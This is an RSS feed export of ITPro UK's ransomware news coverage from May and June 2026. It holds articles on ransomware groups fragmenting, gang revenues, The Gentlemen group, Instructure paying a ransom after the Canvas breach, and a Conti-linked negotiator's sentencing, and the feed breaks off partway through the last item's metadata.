<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:dc="https://purl.org/dc/elements/1.1/"
     xmlns:dcterms="http://purl.org/dc/terms/"
     xmlns:media="http://search.yahoo.com/mrss/"
     xmlns:atom="http://www.w3.org/2005/Atom"
>
    <channel>
                    <atom:link rel="alternate" hreflang="en-GB"
                       href="https://www.itpro.com/uk/feeds/tag/ransomware"
                       type="application/rss+xml"/>
                            <title><![CDATA[ Latest from ITPro UK in Ransomware ]]></title>
                <link>https://www.itpro.com/uk/security/ransomware</link>
        <description><![CDATA[ All the latest ransomware content from the ITPro  UK team ]]></description>
                                    <lastBuildDate>Thu, 04 Jun 2026 08:29:01 +0000</lastBuildDate>
                            <language>en</language>
                                <item>
                                                            <title><![CDATA[ Ransomware cartels are fragmenting into volatile splinter groups, warns Met Police cyber chief ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-crime/ransomware-cartels-are-fragmenting-into-volatile-splinter-groups-warns-met-police-cyber-chief</link>
                                                                            <description>
                            <![CDATA[ Commoditized "cyber crime bazaars" and AI data mining are forcing law enforcement to rewrite its playbook ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">iebQqT6UvKNF2JKXVQaiFd</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/igtMHGaN9ZJo2kb9KB8CDG-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                        <pubDate>Thu, 04 Jun 2026 08:29:01 +0000</pubDate>
                        <updated>Thu, 04 Jun 2026 08:29:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Crime]]></category>
                                                    <category><![CDATA[Security]]></category>
                        <author><![CDATA[ itpro@futurenet.com (Rene Millman) ]]></author>
                        <dc:creator><![CDATA[ Rene Millman ]]></dc:creator>
                        <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/vwWuTPNRCuw9vEaWzuXYnR.png ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/igtMHGaN9ZJo2kb9KB8CDG-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                            <media:description><![CDATA[Shattered glass fragmenting into a multitude of sharp splinters pictured against a black backdrop.]]></media:description>
                            <media:text><![CDATA[Shattered glass fragmenting into a multitude of sharp splinters pictured against a black backdrop.]]></media:text>
                                <media:title type="plain"><![CDATA[Shattered glass fragmenting into a multitude of sharp splinters pictured against a black backdrop.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/igtMHGaN9ZJo2kb9KB8CDG-1280-80.jpg" />
                        <content:encoded>
                            <![CDATA[
                            <article>
                                <p>The global cyber threat landscape is undergoing a radical transformation, moving away from monolithic ransomware cartels toward highly volatile, fragmented splinter groups, a top UK police official has warned.</p><p>Speaking at Infosecurity Europe 2026, William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, told IT and security leaders that the modern cyber crime ecosystem has evolved into a highly accessible space. </p><p>Lyne compared the underground landscape to a bar where threat actors can "get everything but a good drink."</p><p>"It felt like cyber threats were all quite stovepiped. You had hacktivists, you had hostile state actors," Lyne explained, reflecting on his early career. Today, however, those lines have blurred. "Those kind of stovepipes... no longer really exist."</p><p>Instead, Lyne described a blended ecosystem of products, goods, and services that has dramatically lowered the barrier to entry for prospective criminals. </p><p>This shift has been heavily accelerated by cryptocurrencies, which solved the traditional criminal bottleneck of "cashing out." </p><p>Previously, threat actors lost up to 75% of their profits navigating complex, expensive money-mule networks. Today, cryptocurrency allows them to realize illicit gains almost instantly and with very little risk.</p><h2 id="fragmentation-and-the-post-trust-era">Fragmentation and the 'post-trust' era</h2><p>While massive international law enforcement operations have successfully dismantled groups like <a href="https://www.itpro.com/security/ransomware/alleged-lockbit-developer-extradited-to-the-us">LockBit</a> and disrupted <a href="https://www.itpro.com/security/cyber-security/368284/what-is-phishing-as-a-service-phaas">phishing as a service (PhaaS)</a> platforms, Lyne cautioned that the criminal underground is rapidly adapting.</p><p>"It's getting more diverse... [and] also much more fragmented," Lyne said. 
Following high-profile law enforcement crackdowns, cybercriminals have realized that operating as a massive, centralized brand or <a href="https://www.itpro.com/security/29332/the-rise-of-ransomware-as-a-service">ransomware as a service</a> scheme is "actually quite bad for business."</p><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1920px;"><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="JxzEa6dVuBxWeMWLv3oLWk" name="Infosec" alt="William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, speaking on stage during a keynote presentation at Infosecurity Europe 2026 at the ExCel, London." src="https://cdn.mos.cms.futurecdn.net/JxzEa6dVuBxWeMWLv3oLWk.jpg" mos="" align="middle" fullscreen="" width="1920" height="1080" attribution="" endorsement="" class="inline"></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="caption-text">Lyne told attendees the cyber crime landscape is becoming more fragmented and volatile. </span><span class="credit" itemprop="copyrightHolder">(Image credit: ITPro/Rene Millman)</span></figcaption></figure><p>As a result, major ransomware operators are breaking off into smaller, independent factions. </p><p>This fragmentation is leading to a dangerous "post-trust" trend within the criminal ecosystem. Without the strict moderation and internal rules previously enforced by large cartel administrators, smaller threat actors are exhibiting more extreme, aggressive, and unpredictable behaviors.</p><p>The demographics of these attackers are also shifting. 
Lyne noted that the threat landscape is moving beyond traditional Russian-speaking hubs to include actors from Brazil, Türkiye, and English-speaking groups like the notorious Scattered Spider collective.</p><h2 id="ai-weaponizing-hoarded-data">AI weaponizing hoarded data</h2><p>Addressing the inevitable topic of AI, Lyne dispelled fears of autonomous systems launching end-to-end cyber attacks, but highlighted a pressing new risk for enterprise data privacy.</p><p>"These guys are generally not innovative," Lyne noted, explaining they only change their methods if they are "systematically earning less money... or they spy an opportunity to make more money."</p><p>Having stolen and hoarded petabytes of corporate data over the last decade, data that was rarely deleted even when victims paid the ransom, cyber criminals are now using AI tools to operationalize these massive "treasure troves" and mine historic datasets for new extortion and revenue streams.</p><h2 id="rewriting-the-law-enforcement-playbook">Rewriting the law enforcement playbook</h2><p>Faced with this agile, commoditized threat, the Met Police and its international partners are adopting aggressive new disruptive strategies.</p><p>"We can't arrest our way out of this problem," Lyne admitted, citing the jurisdictional complexities of cross-border cyber crime.</p><p>Instead, policing has shifted toward systemic disruption, psychological operations designed to undermine criminal trust, and targeting the foundational infrastructure of the cyber crime supply chain.</p><p>Crucially, this requires unprecedented collaboration with the private sector. Lyne emphasized that the Met Police is increasingly sharing intelligence with enterprise IT security teams and even naming industry partners who assist in operations on their site takedown pages.</p><p>"Ultimately, like, lots of these things just come down to trust," Lyne concluded, addressing the security professionals in the room.
</p><p>"We want to have meaningful, both strategic and tactical collaboration with industry partners that we know hold some of the keys to... the challenges that we have in this space. The cultural change that we have undertaken, I think will continue so that we collaborate better moving forward."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware group profits are rising faster than FTSE 350 firms ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/ransomware-group-profits-are-rising-faster-than-ftse-350-firms</link>
                                                                            <description>
                            <![CDATA[ Sophisticated infrastructure allows servers, leak sites, and negotiation portals to be quickly rebuilt after disruption ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">tYExVJSYeAWjtBpEniGNxX</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/WKbxN6PFmhuPWR27B4ujVn-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                        <pubDate>Tue, 02 Jun 2026 11:05:51 +0000</pubDate>
                        <updated>Tue, 02 Jun 2026 11:05:59 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                        <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>
                        <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/WKbxN6PFmhuPWR27B4ujVn-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                            <media:description><![CDATA[Profit margin concept image showing digital interface with multiple charts showing an upward trajectory.]]></media:description>
                            <media:text><![CDATA[Profit margin concept image showing digital interface with multiple charts showing an upward trajectory.]]></media:text>
                                <media:title type="plain"><![CDATA[Profit margin concept image showing digital interface with multiple charts showing an upward trajectory.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/WKbxN6PFmhuPWR27B4ujVn-1280-80.jpg" />
                        <content:encoded>
                            <![CDATA[
                            <article>
                                <p><a href="https://www.itpro.com/security/28084/what-is-ransomware">Ransomware</a> is still a booming business, according to new research from Rapid7 Labs. So much so that cyber criminal gangs are outperforming major companies.</p><p>Analysis from the <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity</a> firm found ransomware groups made an estimated $529.2 million in the first quarter of this year, with total revenues up by 39% year-on-year.</p><p>That's a better performance than FTSE 350 companies have managed in the same period, not one of which showed year-on-year revenue growth of over 30% during the quarter.</p><p>A number of major cyber crime outfits are profiting from the boom, and it’s been a particularly good year for the <a href="https://www.itpro.com/security/rocketing-number-of-ransomware-groups-as-new-smaller-players-emerge">Qilin ransomware group</a>. Rapid7 researchers noted the group made an estimated $193 million between July 2025 and March 2026.</p><p>The <a href="https://www.itpro.com/security/new-ransomware-threat-group-the-gentlemen-has-become-one-of-the-most-active-ransomware-operators-accounting-for-10-percent-of-all-attacks">Gentlemen group</a>, meanwhile, made an estimated $52 million over the same period.</p><p>"Ransomware groups are not the isolated, hooded hacking crews in dark rooms," said Thom Langford, CTO EMEA at Rapid7. "Instead, many resemble highly efficient businesses generating revenue growth that would make legitimate organizations envious."</p><h2 id="booming-ransomware-revenues">Booming ransomware revenues</h2><p>One reason for the booming revenues is the rise of initial access brokers, which has lowered the barriers to entry by shifting cyber crime from technically specialized <a href="https://www.itpro.com/security/malware/369881/highly-evasive-polymorphic-malware-generated-chatgpt">malware development</a> to a mature underground marketplace. 
</p><p>Access, tooling, and full attack services are now commercially available to almost anyone. Modern cyber crime operations involve distributed networks of specialists handling initial access, <a href="https://www.itpro.com/malware/28076/what-is-malware">malware</a> and <a href="https://www.itpro.com/security/ransomware/ransomware-victims-are-getting-better-at-haggling-with-hackers">ransom negotiations</a>, and working like legitimate supply chains. </p><p>Servers, leak sites, and negotiation portals can be quickly rebuilt after disruption, while law enforcement takedowns take longer to coordinate and execute.</p><p>“The problem is they are demonstrating, very publicly, that ransomware can be a successful criminal enterprise, and ironically, in some ways, they’re more resilient than businesses themselves,” said Langford. </p><p>“Removing one group, one server, or one piece of infrastructure rarely collapses the wider operation because the ecosystem is designed to keep functioning around the damage."</p><h2 id="battling-continued-ransomware-threats">Battling continued ransomware threats</h2><p>Rapid7 said organizations should prioritize identifying and reducing exposed attack surfaces on a continuous basis, focusing on misconfigurations, isolated assets, and internet-facing vulnerabilities. </p><p>These are all commonly exploited in initial access brokerage markets, the study noted. </p><p>Elsewhere, security teams should leverage threat intelligence more proactively to map adversary behavior patterns, infrastructure, tooling, and access pathways.</p><p>Notably, researchers said defenses should shift toward preventing credential and access compromise at source. 
This includes implementation of stronger identity controls, enforcement of least privilege rules, and monitoring for early indicators of credential resale or misuse in underground ecosystems.</p><p>“To give ransomware groups the economic crash they deserve, we need to shift to earlier visibility and earlier action," said Langford. </p><p>"That means businesses understanding exposure, reducing attack surface, tightening identity controls, and using threat intelligence to intervene earlier in the chain before ransomware becomes an outcome rather than a possibility.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ New ransomware threat group, The Gentlemen, has become one of the most active ransomware operators, accounting for 10% of all attacks  ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/new-ransomware-threat-group-the-gentlemen-has-become-one-of-the-most-active-ransomware-operators-accounting-for-10-percent-of-all-attacks</link>
                                                                            <description>
                            <![CDATA[ NTT researchers warn that the RaaS group is leveraging SystemBC malware to establish covert tunnelling, evade detection, and support rapid lateral movement across enterprise environments ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">4gZ8feTHY7ssujqtLTWGv7</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                        <pubDate>Wed, 27 May 2026 09:36:30 +0000</pubDate>
                        <category><![CDATA[Security]]></category>
                        <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>
                        <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                            <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>
                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                        <content:encoded>
                            <![CDATA[
                            <article>
                                <p>A new threat group, The Gentlemen, has become one of the most active ransomware operators, accounting for 10% of all attacks and second only to the notorious <a href="https://www.itpro.com/security/cyber-attacks/thousands-of-procedures-canceled-at-london-hospitals-as-qilin-releases-blood-test-data">Qilin</a>.</p><p>Despite only having emerged in July last year, The Gentlemen has quickly evolved into a highly operational RaaS group, <a href="https://insights.nccgroup.com/l/898251/2026-05-22/31nc1rq/898251/1779445538Mpsajkjn/April_2026___Cyber_Threat_Intelligence_Report.pdf">according to NTT</a>, using advanced tooling and proxy infrastructure to accelerate attacks and improve stealth.</p><p>With a level of technical maturity that would normally be associated with more established <a href="https://www.itpro.com/security/ransomware/the-ransomware-boom-shows-no-signs-of-letting-up-and-these-groups-are-causing-the-most-chaos">ransomware groups</a>, the researchers believe that the group consists of experienced actors with potential ties to other ransomware ecosystems.</p><p>The group's targeting remains focused on industrial organizations, the information technology sector, and some consumer spaces, with notable victims including Synergy France, UK Electronics, and Equity Life. 
</p><p>In terms of target geography, meanwhile, The Gentlemen largely extorts organizations in Europe, with the UK and Germany among the most heavily targeted countries.</p><p>Its affiliates are increasingly leveraging SystemBC malware, a proxy and backdoor tool often used in human-operated ransomware attacks, to establish covert tunnelling, evade detection, and support rapid lateral movement across enterprise environments.</p><p>The group's rapid growth so far this year, combined with its sophisticated proxy infrastructure and obfuscation techniques, means organizations should expect faster intrusion cycles and reduced dwell times before encryption deployment, NTT said. </p><p>"The rise of groups like The Gentlemen demonstrates how affiliates are now combining shared tooling, stealth infrastructure, and repeatable intrusion methods to accelerate attacks at scale," said Matt Hull, VP of cyber intelligence and response at NCC Group. </p><p>"Techniques such as covert tunnelling and rapid domain-wide deployment are shrinking the window that defenders have to detect and respond before encryption occurs."</p><p>According to NTT, there were 748 ransomware listings worldwide during April, representing a 7% fall from the figure for March. 
However, ransomware activity in 2026 has been operating at a higher baseline than much of 2025, as the ransomware-as-a-service (RaaS) ecosystem expands and matures.</p><p><a href="https://www.itpro.com/security/ai-is-raising-the-stakes-for-cyber-professionals-claude-mythos-just-took-things-to-another-level">Claude Mythos</a> – the large language model reportedly capable of autonomously identifying vulnerabilities and developing exploit chains – has yet to make its mark, thanks to restricted access, controlled testing environments, and questions around operational effectiveness at scale.</p><p>"Developments around AI models such as Claude Mythos suggest AI-assisted vulnerability discovery and exploitation could further compress attacker timelines in the future," said Hull. "However, the industry should remain cautious about overstating current capabilities, particularly where testing has been limited to controlled environments."</p><p>The report also highlighted several geopolitical developments likely to influence cyber activity in the coming months, including China's expanded supply chain security regulations, which consolidate and extend existing controls on import and export activities.</p><p>Meanwhile, the strategic significance of NASA's Artemis program is motivating China and other nations to carry out espionage, IP theft activities, and potentially even destructive attacks. </p><p>"Numerous other well-resourced countries (and private companies) are pursuing high-stakes interests dependent on the domain of space; including but not exclusive to India, Japan, Israel, South Korea, UAE, Russia, Iran, and North Korea," the researchers warned. "Defenders should avoid being too narrow in their assessments of potential threats."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                            <title><![CDATA[ Instructure chose to pay a ransom following the Canvas cyber attack – research shows more than half of security leaders would follow suit ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/instructure-chose-to-a-pay-ransom-following-the-canvas-cyber-attack-research-shows-more-than-half-of-security-leaders-would-follow-suit</link>
                                                                            <description>
                            <![CDATA[ Opting to pay ransoms creates huge risks for enterprises – you’re relying on the word of criminals ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">C8kpXhMWZRNGmLFMKia9Go</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pTHELyeufo4Bw39rmQxG3L-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                        <pubDate>Wed, 13 May 2026 12:30:55 +0000</pubDate>
                        <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                        <author><![CDATA[ ross.kelly@futurenet.com (Ross Kelly) ]]></author>
                        <dc:creator><![CDATA[ Ross Kelly ]]></dc:creator>
                        <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/Y5vrV2V98Np6jHAGmAtCd3.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pTHELyeufo4Bw39rmQxG3L-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                            <media:description><![CDATA[Ransomware concept image showing locked digitized padlocks, with one red-colored open padlock.]]></media:description>
                            <media:text><![CDATA[Ransomware concept image showing locked digitized padlocks, with one red-colored open padlock.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing locked digitized padlocks, with one red-colored open padlock.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pTHELyeufo4Bw39rmQxG3L-1280-80.jpg" />
                        <content:encoded>
                            <![CDATA[
                            <article>
                                <p>Experts have warned about the risks of paying ransoms after Instructure bowed to cyber criminal demands to avoid having stolen data published online. </p><p>The move comes after Canvas, a popular academic learning platform developed by Instructure, was <a href="https://www.itpro.com/security/cyber-attacks/instructure-ceo-apologizes-after-canvas-cyber-attack"><u>breached by the ShinyHunters threat group</u></a> last week.</p><p>More than 9,000 academic institutions across the US, UK, Canada, and Australia were <a href="https://www.itpro.com/security/cyber-attacks/universities-worldwide-still-struggling-with-fallout-from-canvas-cyber-attack"><u>impacted by the breach</u></a>, which saw roughly 3.5 terabytes of data stolen by the ransomware group.</p><p>The move by Instructure marks the latest in a string of examples where organizations have chosen to play ball with hackers in the wake of a ransomware attack.</p><p>It’s a contentious topic for many in the security industry, and a tactic that is surprisingly common. Research from Absolute Security, published today, shows that more than half (57%) of CISOs would consider bowing to hacker demands to end a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attack.</p><p>A key factor behind paying up, the study noted, lies in shortening potential downtime due to ransomware attacks. Nearly half (46%) ranked operational downtime as the most significant aspect of an attack.</p><h2 id="to-pay-or-not-to-pay">To pay, or not to pay</h2><p>The question of whether to pay up or not is a catch-22 for enterprises. 
Jeff Watkins of Leeds-based consultancy, NorthStar Intelligence, told <em>ITPro </em>that paying may appear to make sense for many given the potentially disastrous effects of data leaks.</p><p>“Paying cyber criminals may seem like a rational choice to avoid future data leaks, and in ransomware cases, where restoring from backups is not simple/feasible, it is often seen as necessary for business continuity,” he said.</p><p>Watkins pointed to the British Library attack in late 2023, which saw the institution refuse to pay a ransom. Hackers behind the attack subsequently released 500,000 files and recovery took several months – and at great cost.</p><p>Put simply, paying up often represents a small financial hit compared to the broader costs associated with recovery. <a href="https://www.itpro.com/security/ransomware/ransomware-attacks-carry-huge-financial-impacts-but-ciso-worries-still-arent-stopping-firms-from-paying-out"><u>Research last year</u></a>, for example, found the average recovery cost for ransomware victims stood at $4.5 million.</p><p>But this tactic rests on trusting that the cyber criminals in question honor their side of the bargain, according to Watkins.</p><p>“There are risks involved in paying up, though,” he told <em>ITPro</em>. “There is that old adage, ‘there’s no honor amongst thieves’, and there is a risk that you simply lose your money, or they come back for more before deleting the data, providing a decryptor, or suppressing publication."</p><p>The Change Healthcare attack is a prime example of the risks involved with paying up, Watkins noted. 
The healthcare firm <a href="https://www.itpro.com/security/ransomware/unitedhealth-group-admits-to-paying-ransom-after-change-healthcare-cyber-attack"><u>paid a $22 million ransom to the ALPHV/BlackCat group</u></a> after a devastating 2024 attack, and they simply made off with the money.</p><p>RansomHub, an affiliate of ALPHV/BlackCat, still held data stolen in the breach and <a href="https://www.itpro.com/security/ransomware/change-healthcare-hit-with-second-ransomware-attack-of-2024"><u>re-extorted the company</u></a>. </p><h2 id="legal-and-moral-ramifications">Legal and moral ramifications </h2><p>In addition to the operational considerations at play for enterprises, there are legal and moral ramifications.</p><p>The UK’s <a href="https://www.itpro.com/security/what-is-the-national-cyber-security-centre-ncsc-and-what-does-it-do"><u>National Cyber Security Centre (NCSC)</u></a> has been vocal in advising victims against paying up, while the US <a href="https://www.itpro.com/security/what-is-cisa"><u>Cybersecurity and Infrastructure Security Agency (CISA)</u></a> takes a similar stance.</p><p>In 2025, the UK government unveiled proposals aimed at <a href="https://www.itpro.com/security/ransomware/ransomware-payments-are-banned-in-the-public-sector-should-businesses-still-pay"><u>banning ransom payments by public sector and critical national infrastructure (CNI) operators</u></a>.</p><p>At the time, the government <a href="https://www.gov.uk/government/news/uk-to-lead-crackdown-on-cyber-criminals-with-ransomware-measures" target="_blank">said</a> the ban would “target the business model that fuels cyber criminals’ activities”.</p><p>Gary Barlet, public sector CTO at Illumio, said paying a ransom is often viewed as an “incentive for bad behavior” and simply places a bigger target on the back of those already affected by an attack.</p><p>“Cybersecurity professionals caution against this, because it signals to other threat actors that an organization is willing to 
pay if they can manage to steal data,” he told <em>ITPro</em>.</p><p>“Professionals worry that threat actors will then attempt to gain access to the same systems and demand even more in payments.” </p><p>Watkins echoed Barlet’s comments on threat actor incentivization, adding that choosing to pay effectively funds organized crime.</p><p>“This isn’t intended to be a criticism of the victims, as organizations pay because the choices are often ugly, not because they trust the criminals,” he said.</p><p>“They often face operational paralysis, patient/student/client harm, contractual penalties, regulatory exposure, reputational damage, and recovery costs far exceeding the ransom demand,” Watkins added. </p><p>“However, for as long as we allow organizations to pay ransom, the problems will escalate.” </p><h2 id="light-on-the-horizon">Light on the horizon </h2><p>There are positive signs that enterprise policies on ransomware attacks are changing, with many now refusing to play ball. As <a href="https://www.itpro.com/business/business-strategy/ransomware-victims-are-refusing-to-play-ball-with-hackers-just-17-percent-of-enterprises-have-paid-up-so-far-in-2025-marking-an-all-time-low"><u><em>ITPro</em></u><u> reported in August last year</u></a>, research from Databarracks found just 17% of UK businesses paid ransoms in the wake of a breach.</p><p>This marked a steep decline compared to the year prior, in which more than a quarter (27%) opted to pay to recover stolen data. In 2023, nearly half (47%) chose to pay.</p><p>Enterprise backup strategies have helped on this front, the study noted, with victims choosing to recover instead of paying. 
More than half (57%) recovered data through backups after an attack across 2025.</p><p>Notably, Databarracks found enterprises are now three times more likely to recover from backups than to pay hackers, highlighting an increasingly tough approach.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware negotiator sentenced for role in major cyber crime group ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/ransomware-negotiator-sentenced-for-role-in-major-cyber-crime-group</link>
                                                                            <description>
                            <![CDATA[ Deniss Zolotarjovs was a key player in a group associated with Conti ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">st2Lrg9NDXZQZ4mgYomUod</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/4w6boC4sd6Rmk2mt6aw3Ud-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 05 May 2026 14:30:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/4w6boC4sd6Rmk2mt6aw3Ud-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cyber crime concept image showing hacker typing on keyboard in dimly-lit room with tablet pictured on desk. ]]></media:description>                                                            <media:text><![CDATA[Cyber crime concept image showing hacker typing on keyboard in dimly-lit room with tablet pictured on desk. ]]></media:text>
                                <media:title type="plain"><![CDATA[Cyber crime concept image showing hacker typing on keyboard in dimly-lit room with tablet pictured on desk. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/4w6boC4sd6Rmk2mt6aw3Ud-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>A Latvian man has been sentenced to eight and a half years in prison in the US for his role as a negotiator in one of the world's most notorious <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>groups.</p><p>Deniss Zolotarjovs, 35, was a member of a ransomware gang led by former leaders of the <a href="https://www.itpro.com/security/ransomware/363893/conti-ransomware-data-leaked-ukranian-researcher">Conti ransomware group</a>, and variously known as Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, among others.</p><p>Zolotarjovs was arrested in Georgia in December 2023 and transferred into US custody in August 2024. He pleaded guilty in July 2025 to conspiring to commit both money laundering and wire fraud.</p><p>“Cyber criminals might think they are invulnerable by hiding behind anonymizing tools and complex cryptocurrency patterns while they attack American victims from non-extradition countries,” said US attorney Dominick S. Gerace II for the Southern District of Ohio. </p><p>"But Zolotarjovs’s prosecution shows that federal law enforcement also has a global reach, and we will hold accountable bad actors like Zolotarjovs, who will now spend significant time in prison.”</p><h2 id="devastating-ransomware-disruption">Devastating ransomware disruption</h2><p>Between June 2021 and August 2023, the group stole data from more than 54 companies in the US and around the world. </p><p>Of these, attacks on just 13 of those companies resulted in more than $56 million in losses, including approximately $2.8 million in ransom payments. </p><p>Extrapolating from the known victims and known losses, the government said it estimates the total losses for the period to likely be in the hundreds of millions of dollars.</p><p>Zolotarjovs' main role was to pile the pressure on victims who failed to pay up quickly enough. 
He analyzed stolen data, researched victim companies, and exploited his access to particularly sensitive and extremely personal information.</p><p>In one attack on a pediatric healthcare company, Zolotarjovs deliberately leveraged children’s health information for extortion – and when he failed to extract a ransom, he urged his co-conspirators to leak or sell the children’s medical data.</p><p>The group was mostly Russian or Russia-based, and operated for a time out of an office building in St. Petersburg. It had a hierarchical management structure, with work split into separate teams using a network of companies registered throughout Russia, Europe, and the US to obfuscate its operations.</p><p>Members included multiple former Russian law enforcement officers, allowing the group to co-opt Russian government databases and law enforcement connections to intimidate and harass personal detractors, and to identify and evaluate potential new recruits.</p><p>Membership also brought special treatment, with the leaders avoiding Russian taxes and compulsory military service.</p><p>“Deniss Zolotarjovs helped his ransomware gang profit from hacks of dozens of companies, and even on a government entity whose 911 system was forced offline. He also used stolen children’s health information to increase his leverage to extort victim payments,” said assistant attorney general A. Tysen Duva of the Justice Department’s Criminal Division.</p><p>"The Criminal Division will continue to investigate and prosecute international hackers and extortionists from around the world, no matter where they live or operate."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Threat actors ditch ‘spray and pray’ attacks in shift to targeted exploitation ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/threat-actors-ditch-spray-and-pray-attacks-in-shift-to-targeted-exploitation</link>
                                                                            <description>
                            <![CDATA[ A dip in ransomware volumes points to a more targeted approach focused on vulnerability exploitation ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">aXZoaaEbmpsecTfCYFaZAL</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/SDJ7bts4q7L4Ni743DoLPD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 24 Apr 2026 11:19:06 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                <author><![CDATA[ ross.kelly@futurenet.com (Ross Kelly) ]]></author>                    <dc:creator><![CDATA[ Ross Kelly ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/Y5vrV2V98Np6jHAGmAtCd3.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/SDJ7bts4q7L4Ni743DoLPD-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
